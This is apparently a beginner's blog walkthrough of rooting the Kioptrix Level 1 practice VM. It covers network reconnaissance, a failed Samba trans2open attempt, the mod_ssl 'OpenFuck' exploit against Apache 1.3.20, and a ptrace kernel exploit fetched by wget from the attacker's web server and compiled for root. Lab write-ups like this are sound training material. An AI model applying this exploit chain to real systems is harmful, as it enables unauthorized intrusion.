My First Root: A Hacker’s Diary on Kioptrix Level 1
Difficulty: Beginner-Friendly | Category: Boot2Root
Hello there,
I’m Adbin Magar also known as TheGreyLens diving headfirst into the wild world of cybersecurity, and my weekends are spent chasing that exhilarating feeling of popping a shell. My latest obsession? Vulnerable machines. I’ve decided to tackle a classic, a rite of passage for aspiring hackers: Kioptrix Level 1. The mission was simple, yet daunting: get root.
This post is my journey — the dead ends, the “aha!” moments, and the thought process behind the commands. Because let’s be honest, the real learning happens when your first plan blows up in your face.
🎯 The Challenge: Kioptrix Takedown
Category: Boot2Root / Vulnerable Machine
Description: A classic, purpose-built vulnerable machine to test fundamental penetration testing skills. The goal is to find a way in and become the all-powerful root user.
What we got: A freshly booted Kioptrix machine and my trusty Kali Linux sidekick.
When I first powered on the VM, I was met with a simple login screen. No hints, no breadcrumbs. Just a blinking cursor, practically daring me to break in. Challenge accepted. 😉
🔍My Approach: The Hacker’s Playbook
Here’s the thing about Boot2Root challenges they’re puzzles. You start with zero information and have to build your own map to the treasure.
Step 1: Casing the Joint (Reconnaissance is Everything)
Before you can pick a lock, you have to find the door. My first move was to find the machine on my network.
Tool of choice: arp-scan
A quick arp-scan -l on my Kali linux machine did the trick, showing me all the devices on my local network. After ignoring my gateway IP address which left me with a couple other addresses. Then with a quick check, I confirmed the Kioptrix machine was sitting at 192.168.1.4. Target acquired remember this is win.
With this IP in hand, it was time to see what this machine was made of. I fired up my favorite port scanner Nmap to see what services were listening.
The results were a goldmine. 🤑 A few things immediately jumped out:
An ancient version of OpenSSH on port 22.
An even more ancient Apache server (1.3.20) on ports 80 and 443.
And the big one… Samba on port 139.
My eyes lit up. Old versions of Samba are legendary for being full of holes. I had a feeling I knew exactly where to start.
Step 2: The First Plan Goes Sideways (The Samba Detour)
My research pointed to a famous vulnerability called “trans2open,” a classic remote code execution exploit for this version of Samba. Better yet, Metasploit has a ready-made module for it. This felt almost too easy.
I launched Metasploit, loaded up exploit/linux/samba/trans2open, set my RHOSTS to the target IP, and hit “exploit.”
And then… I waited. And waited. I made a tea. I checked my phone. I probably could have learned a new language. After three hours with nothing to show for it, I exit from it.
Lesson learned: The most obvious path isn’t always the fastest or the most reliable. A critical skill in hacking is knowing when to cut your losses and pivot.
Step 3: Finding a Better Door (The Apache Offensive)
Okay, back to the drawing board. I revisited my Nmap scan. What else did I have? That Apache 1.3.20 server looked very promising. An Apache server that old is practically a museum piece.
Tool of choice: searchsploit
I ran searchsploit Apache 1.3.20, and bingo! 🎯 A result come and after research i found “OpenFuck” is well know exploit which is known for targeting a vulnerability in the mod_ssl module of this specific Apache version.
Googling around, I stumbled on the OpenFuck exploit on GitHub.
I followed the instructions, compiled the exploit, and fired it at the server. Success! A shell appeared on my screen. It wasn’t root, but I was in. That’s a huge win.
Step 4: Climbing the Ladder (Privilege Escalation)
Gaining a foothold is one thing; owning the machine is another. Now I needed to escalate my privileges from a lowly user to the king of the castle: root.
My next step was to look for kernel exploits. The version of Linux running on Kioptrix was ancient (2.4.x), and those old kernels are notoriously weak. My research pointed me to a ptrace vulnerability.
Back to searchsploit ptrace linux 2.4, I found a local privilege escalation exploit. Here’s how I got it onto the target:
Copied the exploit C file (3.c) from /usr/share/exploitdb/exploits/linux/local/ to my home directory.
On my Kali machine, I started a simple web server in that directory: python3 -m http.server 8080.
From my shell on the Kioptrix machine, I used wget to download the file from my Kali box.
I compiled the exploit on the target machine with gcc and ran it.
The script worked its magic, and moments later, I was staring at the most beautiful sight in hacking:
root
🚩 Victory!
Root access achieved. Kioptrix Level 1 conquered.
What I Learned (And What You Can Take Away)
Don’t Get Tunnel Vision: My first plan with Samba failed, but I didn’t give up. The ability to pivot to a new attack vector based on your initial recon is a critical skill.
Recon is Your Best Friend: That Nmap scan was my treasure map. When the first path turned into a dead end, the map showed me another way forward.
Hacking is a Two-Step Process: Getting in (initial access) is only the first half of the battle. The second, often more complex part, is escalating your privileges to gain full control.
Kioptrix Level 1 is more than just a vulnerable machine; it’s a teacher. It teaches you methodology, patience, and the sheer joy of finally seeing that root prompt appear.
In last Happy hunting! 🚩
